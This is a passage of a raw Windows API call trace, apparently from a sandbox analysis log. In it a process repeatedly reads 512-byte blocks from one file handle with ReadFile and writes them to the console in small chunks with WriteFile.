WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.364] GetFileType (hFile=0x50) returned 0x1 [0145.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.364] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.364] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.364] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.364] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.364] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.364] GetFileType (hFile=0x50) returned 0x1 [0145.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.364] GetFileType (hFile=0x50) returned 0x1 [0145.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.364] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.364] GetFileType (hFile=0x50) returned 0x1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] GetFileType (hFile=0x50) returned 0x1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] GetFileType (hFile=0x50) returned 0x1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] GetFileType (hFile=0x50) returned 0x1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] GetFileType (hFile=0x50) returned 0x1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] GetFileType (hFile=0x50) returned 0x1 [0145.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.365] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.365] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.365] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.366] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.366] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] GetFileType (hFile=0x50) returned 0x1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] GetFileType (hFile=0x50) returned 0x1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] GetFileType (hFile=0x50) returned 0x1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] GetFileType (hFile=0x50) returned 0x1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] GetFileType (hFile=0x50) returned 0x1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] GetFileType (hFile=0x50) returned 0x1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.366] GetFileType (hFile=0x50) returned 0x1 [0145.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.367] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.367] GetFileType (hFile=0x50) returned 0x1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.367] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.367] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.367] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.367] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.367] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.367] GetFileType (hFile=0x50) returned 0x1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.367] GetFileType (hFile=0x50) returned 0x1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.367] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.367] GetFileType (hFile=0x50) returned 0x1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.367] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.367] GetFileType (hFile=0x50) returned 0x1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.367] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.367] GetFileType (hFile=0x50) returned 0x1 [0145.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] GetFileType (hFile=0x50) returned 0x1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] GetFileType (hFile=0x50) returned 0x1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] GetFileType (hFile=0x50) returned 0x1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.368] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.368] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.368] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.368] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] GetFileType (hFile=0x50) returned 0x1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] GetFileType (hFile=0x50) returned 0x1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.368] GetFileType (hFile=0x50) returned 0x1 [0145.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.369] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.369] GetFileType (hFile=0x50) returned 0x1 [0145.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.369] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.369] GetFileType (hFile=0x50) returned 0x1 [0145.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.369] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.369] GetFileType (hFile=0x50) returned 0x1 [0145.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.369] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.369] GetFileType (hFile=0x50) returned 0x1 [0145.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.369] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.369] GetFileType (hFile=0x50) returned 0x1 [0145.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.369] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.369] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.369] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.369] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.369] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] GetFileType (hFile=0x50) returned 0x1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] GetFileType (hFile=0x50) returned 0x1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] GetFileType (hFile=0x50) returned 0x1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] GetFileType (hFile=0x50) returned 0x1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] GetFileType (hFile=0x50) returned 0x1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] GetFileType (hFile=0x50) returned 0x1 [0145.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.370] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] GetFileType (hFile=0x50) returned 0x1 [0145.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] GetFileType (hFile=0x50) returned 0x1 [0145.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.371] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.371] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.371] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.371] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] GetFileType (hFile=0x50) returned 0x1 [0145.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] GetFileType (hFile=0x50) returned 0x1 [0145.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] GetFileType (hFile=0x50) returned 0x1 [0145.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] GetFileType (hFile=0x50) returned 0x1 [0145.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.371] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] GetFileType (hFile=0x50) returned 0x1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] GetFileType (hFile=0x50) returned 0x1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] GetFileType (hFile=0x50) returned 0x1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] GetFileType (hFile=0x50) returned 0x1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.372] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.372] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.372] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.372] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] GetFileType (hFile=0x50) returned 0x1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] GetFileType (hFile=0x50) returned 0x1 [0145.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.372] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] GetFileType (hFile=0x50) returned 0x1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] GetFileType (hFile=0x50) returned 0x1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] GetFileType (hFile=0x50) returned 0x1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] GetFileType (hFile=0x50) returned 0x1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] GetFileType (hFile=0x50) returned 0x1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] GetFileType (hFile=0x50) returned 0x1 [0145.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.373] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.373] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.373] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.374] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.374] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, 